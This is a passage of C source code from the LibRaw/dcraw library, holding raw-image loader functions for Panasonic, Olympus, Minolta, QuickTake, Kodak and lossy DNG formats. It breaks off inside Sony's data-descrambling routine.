for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
fread(words,sizeof(int),raw_width/3,ifp);
for (col=0; col < raw_width-2; col+=3)
{
bits = words[col/3];
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0)
{
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#else
for (col=0; col < raw_width-2; col+=3) {
bits = get4();
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0) {
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(words);
#endif
maximum = curve[0x3ff];
}
unsigned CLASS pana_bits (int nbits)
{
#ifndef LIBRAW_NOTHREADS
#define buf tls->pana_bits.buf
#define vbits tls->pana_bits.vbits
#else
static uchar buf[0x4000];
static int vbits;
#endif
int byte;
if (!nbits) return vbits=0;
if (!vbits) {
fread (buf+load_flags, 1, 0x4000-load_flags, ifp);
fread (buf, 1, load_flags, ifp);
}
vbits = (vbits - nbits) & 0x1ffff;
byte = vbits >> 3 ^ 0x3ff0;
return (buf[byte] | buf[byte+1] << 8) >> (vbits & 7) & ~((~0u) << nbits);
#ifndef LIBRAW_NOTHREADS
#undef buf
#undef vbits
#endif
}
void CLASS panasonic_load_raw()
{
int row, col, i, j, sh=0, pred[2], nonz[2];
pana_bits(0);
for (row = 0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if ((i = col % 14) == 0)
pred[0] = pred[1] = nonz[0] = nonz[1] = 0;
if (i % 3 == 2) sh = 4 >> (3 - pana_bits(2));
if (nonz[i & 1]) {
if ((j = pana_bits(8))) {
if ((pred[i & 1] -= 0x80 << sh) < 0 || sh == 4)
pred[i & 1] &= ~((~0u) << sh);
pred[i & 1] += j << sh;
}
}
else if ((nonz[i & 1] = pana_bits(8)) || i > 11)
pred[i & 1] = nonz[i & 1] << 4 | pana_bits(4);
if ((RAW(row, col) = pred[col & 1]) > 4098 && col < width && row < height)
derror();
}
}
}
void CLASS olympus_load_raw()
{
ushort huff[4096];
int row, col, nbits, sign, low, high, i, c, w, n, nw;
int acarry[2][3], *carry, pred, diff;
huff[n=0] = 0xc0c;
for (i=12; i--; )
FORC(2048 >> i) huff[++n] = (i+1) << 8 | i;
fseek (ifp, 7, SEEK_CUR);
getbits(-1);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (acarry, 0, sizeof acarry);
for (col=0; col < raw_width; col++) {
carry = acarry[col & 1];
i = 2 * (carry[2] < 3);
for (nbits=2+i; (ushort) carry[0] >> (nbits+i); nbits++);
low = (sign = getbits(3)) & 3;
sign = sign << 29 >> 31;
if ((high = getbithuff(12,huff)) == 12)
high = getbits(16-nbits) >> 1;
carry[0] = (high << nbits) | getbits(nbits);
diff = (carry[0] ^ sign) + carry[1];
carry[1] = (diff*3 + carry[1]) >> 5;
carry[2] = carry[0] > 16 ? 0 : carry[2]+1;
if (col >= width) continue;
if (row < 2 && col < 2) pred = 0;
else if (row < 2) pred = RAW(row,col-2);
else if (col < 2) pred = RAW(row-2,col);
else {
w = RAW(row,col-2);
n = RAW(row-2,col);
nw = RAW(row-2,col-2);
if ((w < nw && nw < n) || (n < nw && nw < w)) {
if (ABS(w-nw) > 32 || ABS(n-nw) > 32)
pred = w + n - nw;
else pred = (w + n) >> 1;
} else pred = ABS(w-nw) > ABS(n-nw) ? w : n;
}
if ((RAW(row,col) = pred + ((diff << 2) | low)) >> 12) derror();
}
}
}
void CLASS minolta_rd175_load_raw()
{
uchar pixel[768];
unsigned irow, box, row, col;
for (irow=0; irow < 1481; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 768, ifp) < 768) derror();
box = irow / 82;
row = irow % 82 * 12 + ((box < 12) ? box | 1 : (box-12)*2);
switch (irow) {
case 1477: case 1479: continue;
case 1476: row = 984; break;
case 1480: row = 985; break;
case 1478: row = 985; box = 1;
}
if ((box < 12) && (box & 1)) {
for (col=0; col < 1533; col++, row ^= 1)
if (col != 1) RAW(row,col) = (col+1) & 2 ?
pixel[col/2-1] + pixel[col/2+1] : pixel[col/2] << 1;
RAW(row,1) = pixel[1] << 1;
RAW(row,1533) = pixel[765] << 1;
} else
for (col=row & 1; col < 1534; col+=2)
RAW(row,col) = pixel[col/2] << 1;
}
maximum = 0xff << 1;
}
void CLASS quicktake_100_load_raw()
{
uchar pixel[484][644];
static const short gstep[16] =
{ -89,-60,-44,-32,-22,-15,-8,-2,2,8,15,22,32,44,60,89 };
static const short rstep[6][4] =
{ { -3,-1,1,3 }, { -5,-1,1,5 }, { -8,-2,2,8 },
{ -13,-3,3,13 }, { -19,-4,4,19 }, { -28,-6,6,28 } };
static const short t_curve[256] =
{ 0,1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,
28,29,30,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,53,
54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,74,75,76,77,78,
79,80,81,82,83,84,86,88,90,92,94,97,99,101,103,105,107,110,112,114,116,
118,120,123,125,127,129,131,134,136,138,140,142,144,147,149,151,153,155,
158,160,162,164,166,168,171,173,175,177,179,181,184,186,188,190,192,195,
197,199,201,203,205,208,210,212,214,216,218,221,223,226,230,235,239,244,
248,252,257,261,265,270,274,278,283,287,291,296,300,305,309,313,318,322,
326,331,335,339,344,348,352,357,361,365,370,374,379,383,387,392,396,400,
405,409,413,418,422,426,431,435,440,444,448,453,457,461,466,470,474,479,
483,487,492,496,500,508,519,531,542,553,564,575,587,598,609,620,631,643,
654,665,676,687,698,710,721,732,743,754,766,777,788,799,810,822,833,844,
855,866,878,889,900,911,922,933,945,956,967,978,989,1001,1012,1023 };
int rb, row, col, sharp, val=0;
#ifdef LIBRAW_LIBRARY_BUILD
if(width>640 || height > 480)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
getbits(-1);
memset (pixel, 0x80, sizeof pixel);
for (row=2; row < height+2; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=2+(row & 1); col < width+2; col+=2) {
val = ((pixel[row-1][col-1] + 2*pixel[row-1][col+1] +
pixel[row][col-2]) >> 2) + gstep[getbits(4)];
pixel[row][col] = val = LIM(val,0,255);
if (col < 4)
pixel[row][col-2] = pixel[row+1][~row & 1] = val;
if (row == 2)
pixel[row-1][col+1] = pixel[row-1][col+3] = val;
}
pixel[row][col] = val;
}
for (rb=0; rb < 2; rb++)
for (row=2+rb; row < height+2; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
if (row < 4 || col < 4) sharp = 2;
else {
val = ABS(pixel[row-2][col] - pixel[row][col-2])
+ ABS(pixel[row-2][col] - pixel[row-2][col-2])
+ ABS(pixel[row][col-2] - pixel[row-2][col-2]);
sharp = val < 4 ? 0 : val < 8 ? 1 : val < 16 ? 2 :
val < 32 ? 3 : val < 48 ? 4 : 5;
}
val = ((pixel[row-2][col] + pixel[row][col-2]) >> 1)
+ rstep[sharp][getbits(2)];
pixel[row][col] = val = LIM(val,0,255);
if (row < 4) pixel[row-2][col+2] = val;
if (col < 4) pixel[row+2][col-2] = val;
}
}
for (row=2; row < height+2; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
val = ((pixel[row][col-1] + (pixel[row][col] << 2) +
pixel[row][col+1]) >> 1) - 0x100;
pixel[row][col] = LIM(val,0,255);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = t_curve[pixel[row+2][col+2]];
}
maximum = 0x3ff;
}
#define radc_token(tree) ((signed char) getbithuff(8,huff[tree]))
#define FORYX for (y=1; y < 3; y++) for (x=col+1; x >= col; x--)
#define PREDICTOR (c ? (buf[c][y-1][x] + buf[c][y][x+1]) / 2 \
: (buf[c][y-1][x+1] + 2*buf[c][y-1][x] + buf[c][y][x+1]) / 4)
#ifdef __GNUC__
# if __GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 8)
# pragma GCC optimize("no-aggressive-loop-optimizations")
# endif
#endif
void CLASS kodak_radc_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
// All kodak radc images are 768x512
if(width>768 || raw_width>768 || height > 512 || raw_height>512 )
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
static const signed char src[] = {
1,1, 2,3, 3,4, 4,2, 5,7, 6,5, 7,6, 7,8,
1,0, 2,1, 3,3, 4,4, 5,2, 6,7, 7,6, 8,5, 8,8,
2,1, 2,3, 3,0, 3,2, 3,4, 4,6, 5,5, 6,7, 6,8,
2,0, 2,1, 2,3, 3,2, 4,4, 5,6, 6,7, 7,5, 7,8,
2,1, 2,4, 3,0, 3,2, 3,3, 4,7, 5,5, 6,6, 6,8,
2,3, 3,1, 3,2, 3,4, 3,5, 3,6, 4,7, 5,0, 5,8,
2,3, 2,6, 3,0, 3,1, 4,4, 4,5, 4,7, 5,2, 5,8,
2,4, 2,7, 3,3, 3,6, 4,1, 4,2, 4,5, 5,0, 5,8,
2,6, 3,1, 3,3, 3,5, 3,7, 3,8, 4,0, 5,2, 5,4,
2,0, 2,1, 3,2, 3,3, 4,4, 4,5, 5,6, 5,7, 4,8,
1,0, 2,2, 2,-2,
1,-3, 1,3,
2,-17, 2,-5, 2,5, 2,17,
2,-7, 2,2, 2,9, 2,18,
2,-18, 2,-9, 2,-2, 2,7,
2,-28, 2,28, 3,-49, 3,-9, 3,9, 4,49, 5,-79, 5,79,
2,-1, 2,13, 2,26, 3,39, 4,-16, 5,55, 6,-37, 6,76,
2,-26, 2,-13, 2,1, 3,-39, 4,16, 5,-55, 6,-76, 6,37
};
ushort huff[19][256];
int row, col, tree, nreps, rep, step, i, c, s, r, x, y, val;
short last[3] = { 16,16,16 }, mul[3], buf[3][3][386];
static const ushort pt[] =
{ 0,0, 1280,1344, 2320,3616, 3328,8000, 4095,16383, 65535,16383 };
for (i=2; i < 12; i+=2)
for (c=pt[i-2]; c <= pt[i]; c++)
curve[c] = (float)
(c-pt[i-2]) / (pt[i]-pt[i-2]) * (pt[i+1]-pt[i-1]) + pt[i-1] + 0.5;
for (s=i=0; i < sizeof src; i+=2)
FORC(256 >> src[i])
((ushort *)huff)[s++] = src[i] << 8 | (uchar) src[i+1];
s = kodak_cbpp == 243 ? 2 : 3;
FORC(256) huff[18][c] = (8-s) << 8 | c >> s << s | 1 << (s-1);
getbits(-1);
for (i=0; i < sizeof(buf)/sizeof(short); i++)
((short *)buf)[i] = 2048;
for (row=0; row < height; row+=4) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC3 mul[c] = getbits(6);
#ifdef LIBRAW_LIBRARY_BUILD
if(!mul[0] || !mul[1] || !mul[2])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
FORC3 {
val = ((0x1000000/last[c] + 0x7ff) >> 12) * mul[c];
s = val > 65564 ? 10:12;
x = ~((~0u) << (s-1));
val <<= 12-s;
for (i=0; i < sizeof(buf[0])/sizeof(short); i++)
((short *)buf[c])[i] = (((short *)buf[c])[i] * val + x) >> s;
last[c] = mul[c];
for (r=0; r <= !c; r++) {
buf[c][1][width/2] = buf[c][2][width/2] = mul[c] << 7;
for (tree=1, col=width/2; col > 0; ) {
if ((tree = radc_token(tree))) {
col -= 2;
if (tree == 8)
FORYX buf[c][y][x] = (uchar) radc_token(18) * mul[c];
else
FORYX buf[c][y][x] = radc_token(tree+10) * 16 + PREDICTOR;
} else
do {
nreps = (col > 2) ? radc_token(9) + 1 : 1;
for (rep=0; rep < 8 && rep < nreps && col > 0; rep++) {
col -= 2;
if(col>=0)
FORYX buf[c][y][x] = PREDICTOR;
if (rep & 1) {
step = radc_token(10) << 4;
FORYX buf[c][y][x] += step;
}
}
} while (nreps == 9);
}
for (y=0; y < 2; y++)
for (x=0; x < width/2; x++) {
val = (buf[c][y+1][x] << 4) / mul[c];
if (val < 0) val = 0;
if (c) RAW(row+y*2+c-1,x*2+2-c) = val;
else RAW(row+r*2+y,x*2+y) = val;
}
memcpy (buf[c][0]+!c, buf[c][2], sizeof buf[c][0]-2*!c);
}
}
for (y=row; y < row+4; y++)
for (x=0; x < width; x++)
if ((x+y) & 1) {
r = x ? x-1 : x+1;
s = x+1 < width ? x+1 : x-1;
val = (RAW(y,x)-2048)*2 + (RAW(y,r)+RAW(y,s))/2;
if (val < 0) val = 0;
RAW(y,x) = val;
}
}
for (i=0; i < height*width; i++)
raw_image[i] = curve[raw_image[i]];
maximum = 0x3fff;
}
#undef FORYX
#undef PREDICTOR
#ifdef NO_JPEG
void CLASS kodak_jpeg_load_raw() {}
void CLASS lossy_dng_load_raw() {}
#else
#ifndef LIBRAW_LIBRARY_BUILD
METHODDEF(boolean)
fill_input_buffer (j_decompress_ptr cinfo)
{
static uchar jpeg_buffer[4096];
size_t nbytes;
nbytes = fread (jpeg_buffer, 1, 4096, ifp);
swab (jpeg_buffer, jpeg_buffer, nbytes);
cinfo->src->next_input_byte = jpeg_buffer;
cinfo->src->bytes_in_buffer = nbytes;
return TRUE;
}
void CLASS kodak_jpeg_load_raw()
{
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
int row, col;
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
jpeg_stdio_src (&cinfo, ifp);
cinfo.src->fill_input_buffer = fill_input_buffer;
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 )) {
fprintf (stderr,_("%s: incorrect JPEG dimensions\n"), ifname);
jpeg_destroy_decompress (&cinfo);
longjmp (failure, 3);
}
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, width*3, 1);
while (cinfo.output_scanline < cinfo.output_height) {
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
maximum = 0xff << 1;
}
#else
struct jpegErrorManager {
struct jpeg_error_mgr pub;
};
static void jpegErrorExit (j_common_ptr cinfo)
{
jpegErrorManager* myerr = (jpegErrorManager*) cinfo->err;
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
// LibRaw's Kodak_jpeg_load_raw
void CLASS kodak_jpeg_load_raw()
{
if(data_size < 1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
int row, col;
jpegErrorManager jerr;
struct jpeg_decompress_struct cinfo;
cinfo.err = jpeg_std_error(&jerr.pub);
jerr.pub.error_exit = jpegErrorExit;
unsigned char *jpg_buf = (unsigned char *)malloc(data_size);
merror(jpg_buf,"kodak_jpeg_load_raw");
unsigned char *pixel_buf = (unsigned char*) malloc(width*3);
jpeg_create_decompress (&cinfo);
merror(pixel_buf,"kodak_jpeg_load_raw");
fread(jpg_buf,data_size,1,ifp);
swab ((char*)jpg_buf, (char*)jpg_buf, data_size);
try
{
jpeg_mem_src(&cinfo, jpg_buf, data_size);
int rc = jpeg_read_header(&cinfo, TRUE);
if(rc!=1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 ))
{
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
unsigned char *buf[1];
buf[0] = pixel_buf;
while (cinfo.output_scanline < cinfo.output_height)
{
checkCancel();
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
unsigned char (*pixel)[3] = (unsigned char (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
}
catch (...)
{
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
throw;
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
maximum = 0xff << 1;
}
#endif
#ifndef LIBRAW_LIBRARY_BUILD
void CLASS gamma_curve (double pwr, double ts, int mode, int imax);
#endif
void CLASS lossy_dng_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
unsigned sorder=order, ntags, opcode, deg, i, j, c;
unsigned save=data_offset-4, trow=0, tcol=0, row, col;
ushort cur[3][256];
double coeff[9], tot;
if (meta_offset) {
fseek (ifp, meta_offset, SEEK_SET);
order = 0x4d4d;
ntags = get4();
while (ntags--) {
opcode = get4(); get4(); get4();
if (opcode != 8)
{ fseek (ifp, get4(), SEEK_CUR); continue; }
fseek (ifp, 20, SEEK_CUR);
if ((c = get4()) > 2) break;
fseek (ifp, 12, SEEK_CUR);
if ((deg = get4()) > 8) break;
for (i=0; i <= deg && i < 9; i++)
coeff[i] = getreal(12);
for (i=0; i < 256; i++) {
for (tot=j=0; j <= deg; j++)
tot += coeff[j] * pow(i/255.0, (int)j);
cur[c][i] = tot*0xffff;
}
}
order = sorder;
} else {
gamma_curve (1/2.4, 12.92, 1, 255);
FORC3 memcpy (cur[c], curve, sizeof cur[0]);
}
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
while (trow < raw_height) {
fseek (ifp, save+=4, SEEK_SET);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
if(libraw_internal_data.internal_data.input->jpeg_src(&cinfo) == -1)
{
jpeg_destroy_decompress(&cinfo);
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
#else
jpeg_stdio_src (&cinfo, ifp);
#endif
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, cinfo.output_width*3, 1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (cinfo.output_scanline < cinfo.output_height &&
(row = trow + cinfo.output_scanline) < height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < cinfo.output_width && tcol+col < width; col++) {
FORC3 image[row*width+tcol+col][c] = cur[c][pixel[col][c]];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
jpeg_destroy_decompress (&cinfo);
throw;
}
#endif
jpeg_abort_decompress (&cinfo);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
}
jpeg_destroy_decompress (&cinfo);
maximum = 0xffff;
}
#endif
void CLASS kodak_dc120_load_raw()
{
static const int mul[4] = { 162, 192, 187, 92 };
static const int add[4] = { 0, 636, 424, 212 };
uchar pixel[848];
int row, shift, col;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 848, ifp) < 848) derror();
shift = row * mul[row & 3] + add[row & 3];
for (col=0; col < width; col++)
RAW(row,col) = (ushort) pixel[(col + shift) % 848];
}
maximum = 0xff;
}
void CLASS eight_bit_load_raw()
{
uchar *pixel;
unsigned row, col;
pixel = (uchar *) calloc (raw_width, sizeof *pixel);
merror (pixel, "eight_bit_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, raw_width, ifp) < raw_width) derror();
for (col=0; col < raw_width; col++)
RAW(row,col) = curve[pixel[col]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c330_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 2*sizeof *pixel);
merror (pixel, "kodak_c330_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, raw_width, 2, ifp) < 2) derror();
if (load_flags && (row & 31) == 31)
fseek (ifp, raw_width*32, SEEK_CUR);
for (col=0; col < width; col++) {
y = pixel[col*2];
cb = pixel[(col*2 & -4) | 1] - 128;
cr = pixel[(col*2 & -4) | 3] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c603_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 3*sizeof *pixel);
merror (pixel, "kodak_c603_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (~row & 1)
if (fread (pixel, raw_width, 3, ifp) < 3) derror();
for (col=0; col < width; col++) {
y = pixel[width*2*(row & 1) + col];
cb = pixel[width + (col & -2)] - 128;
cr = pixel[width + (col & -2)+1] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_262_load_raw()
{
static const uchar kodak_tree[2][26] =
{ { 0,1,5,1,1,2,0,0,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 },
{ 0,3,1,1,1,1,1,2,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 } };
ushort *huff[2];
uchar *pixel;
int *strip, ns, c, row, col, chess, pi=0, pi1, pi2, pred, val;
FORC(2) huff[c] = make_decoder (kodak_tree[c]);
ns = (raw_height+63) >> 5;
pixel = (uchar *) malloc (raw_width*32 + ns*4);
merror (pixel, "kodak_262_load_raw()");
strip = (int *) (pixel + raw_width*32);
order = 0x4d4d;
FORC(ns) strip[c] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if ((row & 31) == 0) {
fseek (ifp, strip[row >> 5], SEEK_SET);
getbits(-1);
pi = 0;
}
for (col=0; col < raw_width; col++) {
chess = (row + col) & 1;
pi1 = chess ? pi-2 : pi-raw_width-1;
pi2 = chess ? pi-2*raw_width : pi-raw_width+1;
if (col <= chess) pi1 = -1;
if (pi1 < 0) pi1 = pi2;
if (pi2 < 0) pi2 = pi1;
if (pi1 < 0 && col > 1) pi1 = pi2 = pi-2;
pred = (pi1 < 0) ? 0 : (pixel[pi1] + pixel[pi2]) >> 1;
pixel[pi] = val = pred + ljpeg_diff (huff[chess]);
if (val >> 8) derror();
val = curve[pixel[pi++]];
RAW(row,col) = val;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
FORC(2) free (huff[c]);
}
int CLASS kodak_65000_decode (short *out, int bsize)
{
uchar c, blen[768];
ushort raw[6];
INT64 bitbuf=0;
int save, bits=0, i, j, len, diff;
save = ftell(ifp);
bsize = (bsize + 3) & -4;
for (i=0; i < bsize; i+=2) {
c = fgetc(ifp);
if ((blen[i ] = c & 15) > 12 ||
(blen[i+1] = c >> 4) > 12 ) {
fseek (ifp, save, SEEK_SET);
for (i=0; i < bsize; i+=8) {
read_shorts (raw, 6);
out[i ] = raw[0] >> 12 << 8 | raw[2] >> 12 << 4 | raw[4] >> 12;
out[i+1] = raw[1] >> 12 << 8 | raw[3] >> 12 << 4 | raw[5] >> 12;
for (j=0; j < 6; j++)
out[i+2+j] = raw[j] & 0xfff;
}
return 1;
}
}
if ((bsize & 7) == 4) {
bitbuf = fgetc(ifp) << 8;
bitbuf += fgetc(ifp);
bits = 16;
}
for (i=0; i < bsize; i++) {
len = blen[i];
if (bits < len) {
for (j=0; j < 32; j+=8)
bitbuf += (INT64) fgetc(ifp) << (bits+(j^8));
bits += 32;
}
diff = bitbuf & (0xffff >> (16-len));
bitbuf >>= len;
bits -= len;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
out[i] = diff;
}
return 0;
}
void CLASS kodak_65000_load_raw()
{
short buf[272]; /* extra room for data stored w/o predictor */
int row, col, len, pred[2], ret, i;
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
pred[0] = pred[1] = 0;
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len);
for (i=0; i < len; i++)
{
int idx = ret ? buf[i] : (pred[i & 1] += buf[i]);
if(idx >=0 && idx <= 0xffff)
{
if ((RAW(row,col+i) = curve[idx]) >> 12) derror();
}
else
derror();
}
}
}
}
void CLASS kodak_ycbcr_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[384], *bp;
int row, col, len, c, i, j, k, y[2][2], cb, cr, rgb[3];
ushort *ip;
if (!image) return;
unsigned int bits = (load_flags && load_flags > 9 && load_flags < 17)?load_flags:10;
for (row=0; row < height; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=128) {
len = MIN (128, width-col);
kodak_65000_decode (buf, len*3);
y[0][1] = y[1][1] = cb = cr = 0;
for (bp=buf, i=0; i < len; i+=2, bp+=2) {
cb += bp[4];
cr += bp[5];
rgb[1] = -((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
for (j=0; j < 2; j++)
for (k=0; k < 2; k++) {
if ((y[j][k] = y[j][k^1] + *bp++) >> bits) derror();
ip = image[(row+j)*width + col+i+k];
FORC3 ip[c] = curve[LIM(y[j][k]+rgb[c], 0, 0xfff)];
}
}
}
}
}
void CLASS kodak_rgb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[768], *bp;
int row, col, len, c, i, rgb[3],ret;
ushort *ip=image[0];
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len*3);
memset (rgb, 0, sizeof rgb);
for (bp=buf, i=0; i < len; i++, ip+=4)
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags == 12)
{
FORC3 ip[c] = ret ? (*bp++) : (rgb[c] += *bp++);
}
else
#endif
FORC3 if ((ip[c] = ret ? (*bp++) : (rgb[c] += *bp++)) >> 12) derror();
}
}
}
void CLASS kodak_thumb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col;
colors = thumb_misc >> 5;
for (row=0; row < height; row++)
for (col=0; col < width; col++)
read_shorts (image[row*width+col], colors);
maximum = (1 << (thumb_misc & 31)) - 1;
}
void CLASS sony_decrypt (unsigned *data, int len, int start, int key)
{
#ifndef LIBRAW_NOTHREADS
#define pad tls->sony_decrypt.pad
#define p tls->sony_decrypt.p
#else
static unsigned pad[128], p;
#endif
if (start) {
for (p=0; p < 4; p++)
pad[p] = key = key * 48828125 + 1;
pad[3] = pad[3] << 1 | (pad[0]^pad[2]) >> 31;
for (p=4; p < 127; p++)
pad[p] = (pad[p-4]^pad[p-2]) << 1 | (pad[p-3]^pad[p-1]) >> 31;
for (p=0; p < 127; p++)
pad[p] = htonl(pad[p]);
}
while (len--)
{
*data++ ^= pad[p & 127] = pad[(p+1) & 127] ^ pad[(p+65) & 127];
p++;
}
